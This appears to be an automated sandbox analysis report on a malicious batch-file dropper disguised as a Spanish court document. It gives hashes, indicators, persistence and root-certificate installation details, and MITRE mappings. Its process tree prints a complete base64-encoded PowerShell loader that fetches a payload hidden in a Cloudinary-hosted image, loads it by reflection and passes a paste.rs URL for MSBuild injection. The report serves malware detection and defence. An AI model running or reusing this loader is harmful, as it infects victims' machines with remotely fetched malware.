7a5c7d41661c07aab56e46b7ab2b4a40b0b8be68f5bf6770932c4925b0ccc5bf

General

Target

AUTO SAA.988.2024 de fecha 11-12-2024, EXP 68861-483-2007.bat
Size

762B
MD5

3bc876ec13e78ae0b6dcd7fd090e5d79
SHA1

cc7e4241cc16734ee88c62d44e3380e3b8fea252
SHA256

7a5c7d41661c07aab56e46b7ab2b4a40b0b8be68f5bf6770932c4925b0ccc5bf
SHA512

7534ead66565f1c28e0295382407a68ef3426816c3ac3c374ea7be408d80ef0663a708baa9df90e756a27fbfb271651aff6ce8b5f5025f0ac6b3e254532177f6

Score

10^/10

execution

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://res.cloudinary.com/dz07tpeae/image/upload/v1736281357/buq8k0r4nmws3n72p2re.jpg%20

exe.dropper

https://res.cloudinary.com/dz07tpeae/image/upload/v1736281357/buq8k0r4nmws3n72p2re.jpg%20

Signatures

Blocklisted process makes network request 4 IoCs

flow	pid	Process
5	2308	wscript.exe
7	2308	wscript.exe
9	2960	powershell.exe
11	2960	powershell.exe

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\heteroploidy.bat	cmd.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\heteroploidy.bat	cmd.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2960	powershell.exe

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
2220	timeout.exe

Modifies system certificate store 2 TTPs 2 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8	wscript.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827	wscript.exe

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
2960	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	2960	powershell.exe

Suspicious use of WriteProcessMemory 9 IoCs

description	pid	Process	procid_target
PID 3008 wrote to memory of 2308	3008	cmd.exe	31
PID 3008 wrote to memory of 2308	3008	cmd.exe	31
PID 3008 wrote to memory of 2308	3008	cmd.exe	31
PID 3008 wrote to memory of 2220	3008	cmd.exe	32
PID 3008 wrote to memory of 2220	3008	cmd.exe	32
PID 3008 wrote to memory of 2220	3008	cmd.exe	32
PID 2308 wrote to memory of 2960	2308	wscript.exe	34
PID 2308 wrote to memory of 2960	2308	wscript.exe	34
PID 2308 wrote to memory of 2960	2308	wscript.exe	34

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\AUTO SAA.988.2024 de fecha 11-12-2024, EXP 68861-483-2007.bat"
1⤵
- Drops startup file
- Suspicious use of WriteProcessMemory
PID:3008
- C:\Windows\system32\wscript.exe
  wscript //nologo "C:\Windows\Temp\osteotomist.vbs"
  2⤵
  - Blocklisted process makes network request
  - Modifies system certificate store
  - Suspicious use of WriteProcessMemory
  PID:2308
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $subscriptive = 'aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07JGFub21vY2FycG91cyA9ICdodHRwczovL3Jlcy5jbG91ZGluYXJ5LmNvbS9kejA3dHBlYWUvaW1hZ2UvdXBsb2FkL3YxNzM2MjgxMzU3L2J1cThrMHI0bm13czNuNzJwMnJlLmpwZyAnOyRwaGFzc2FjaGF0ZSA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7JHBlcmZvcmF0aSA9ICRwaGFzc2FjaGF0ZS5Eb3dubG9hZERhdGEoJGFub21vY2FycG91cyk7JGhvYmJsaW5nbHkgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkcGVyZm9yYXRpKTskdW5zd2VydmluZyA9ICc8PEJBU0U2NF9TVEFSVD4+JzskbGFuZGF1bGV0cyA9ICc8PEJBU0U2NF9FTkQ+Pic7JG1vbm9tZXRhbGxpc3QgPSAkaG9iYmxpbmdseS5JbmRleE9mKCR1bnN3ZXJ2aW5nKTskY29tcG9zc2liaWxpdHkgPSAkaG9iYmxpbmdseS5JbmRleE9mKCRsYW5kYXVsZXRzKTskbW9ub21ldGFsbGlzdCAtZ2UgMCAtYW5kICRjb21wb3NzaWJpbGl0eSAtZ3QgJG1vbm9tZXRhbGxpc3Q7JG1vbm9tZXRhbGxpc3QgKz0gJHVuc3dlcnZpbmcuTGVuZ3RoOyRzZnJlZ2F6emkgPSAkY29tcG9zc2liaWxpdHkgLSAkbW9ub21ldGFsbGlzdDska291cmJhc2ggPSAkaG9iYmxpbmdseS5TdWJzdHJpbmcoJG1vbm9tZXRhbGxpc3QsICRzZnJlZ2F6emkpOyRnYWxhY3RvdGhlcmFweSA9IC1qb2luICgka291cmJhc2guVG9DaGFyQXJyYXkoKSB8IEZvckVhY2gtT2JqZWN0IHsgJF8gfSlbLTEuLi0oJGtvdXJiYXNoLkxlbmd0aCldOyRub25lc3RlcnMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRnYWxhY3RvdGhlcmFweSk7JG1hc3Rpa2FzID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCgkbm9uZXN0ZXJzKTskY29waWxvdCA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRjb3BpbG90Lkludm9rZSgkbnVsbCwgQCgnejdVYXAvc3IuZXRzYXAvLzpzcHR0aCcsICdzdW5iZWFtJywgJ3N1bmJlYW0nLCAnc3VuYmVhbScsICdNU0J1aWxkJywgJ3N1bmJlYW0nLCAnc3VuYmVhbScsJ3N1bmJlYW0nLCdzdW5iZWFtJywnc3VuYmVhbScsJ3N1bmJlYW0nLCdzdW5iZWFtJywnMScsJ3N1bmJlYW0nLCdUYXNrTmFtZScpKTtpZiAoJG51bGwgLW5lICRQU1ZlcnNpb25UYWJsZSAtYW5kICRQU1ZlcnNpb25UYWJsZS5QU1ZlcnNpb24gLW5lICRudWxsKSB7IFt2b2lkXSRQU1ZlcnNpb25UYWJsZS5QU1ZlcnNpb24gfSBlbHNlIHsgV3JpdGUtT3V0cHV0ICdQb3dlclNoZWxsIHZlcnNpb24gTm90IGF2YWlsYWJsZScgfTtpZiAoJG51bGwgLW5lICRQU1ZlcnNpb25UYWJsZSAtYW5kICRQU1ZlcnNpb25UYWJsZS5QU1ZlcnNpb24gLW5lICRudWxsKSB7IFt2b2lkXSRQU1ZlcnNpb25UYWJsZS5QU1ZlcnNpb24gfSBlbHNlIHsgV3JpdGUtT3V0cHV0ICdQb3dlclNoZWxsIHZlcnNpb24gTm90IGF2YWlsYWJsZScgfTs=';$preribosomal = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($subscriptive));Invoke-Expression $preribosomal
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2960
- C:\Windows\system32\timeout.exe
  timeout /t 1 /nobreak
  2⤵
  - Delays execution with timeout.exe
  PID:2220

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

1

T1112

Subvert Trust Controls

1

T1553

Install Root Certificate

1

T1553.004

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\CabB26E.tmp

Filesize
70KB

MD5
49aebf8cbd62d92ac215b2923fb1b9f5

SHA1
1723be06719828dda65ad804298d0431f6aff976

SHA256
b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

SHA512
bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

Download Submit
C:\Users\Admin\AppData\Local\Temp\TarB31C.tmp

Filesize
181KB

MD5
4ea6026cf93ec6338144661bf1202cd1

SHA1
a1dec9044f750ad887935a01430bf49322fbdcb7

SHA256
8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

SHA512
6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

Download Submit
C:\Windows\Temp\osteotomist.vbs

Filesize
259B

MD5
0a4007f30176f2869fa5fc7e2f33e2c5

SHA1
56aa7230ea0b4f81b31e7a8e35b78ff85080ece6

SHA256
39d31ebfdf9dc81956d87e120600a22adebf7409c3777bb2c04b9b5d46c23045

SHA512
1b33e6715fdcd7072330ba4e775e681bacf1f8ba12bafe4ee39de2ce9886c81808e0e64b859abd0296d91b8676e3f572bc24e5fcf4a23fc4119c4e53cf1f1f9c

Download Submit
memory/2960-19-0x000007FEF540E000-0x000007FEF540F000-memory.dmp

Filesize
4KB

Download
memory/2960-20-0x000000001B720000-0x000000001BA02000-memory.dmp

Filesize
2.9MB

Download
memory/2960-21-0x000007FEF5150000-0x000007FEF5AED000-memory.dmp

Filesize
9.6MB

Download
memory/2960-23-0x000007FEF5150000-0x000007FEF5AED000-memory.dmp

Filesize
9.6MB

Download
memory/2960-22-0x00000000027E0000-0x00000000027E8000-memory.dmp

Filesize
32KB

Download
memory/2960-25-0x000007FEF5150000-0x000007FEF5AED000-memory.dmp

Filesize
9.6MB

Download
memory/2960-24-0x000007FEF5150000-0x000007FEF5AED000-memory.dmp

Filesize
9.6MB

Download
memory/2960-26-0x000007FEF5150000-0x000007FEF5AED000-memory.dmp

Filesize
9.6MB

Download
memory/2960-61-0x000007FEF5150000-0x000007FEF5AED000-memory.dmp

Filesize
9.6MB

Download

Analysis

Sharing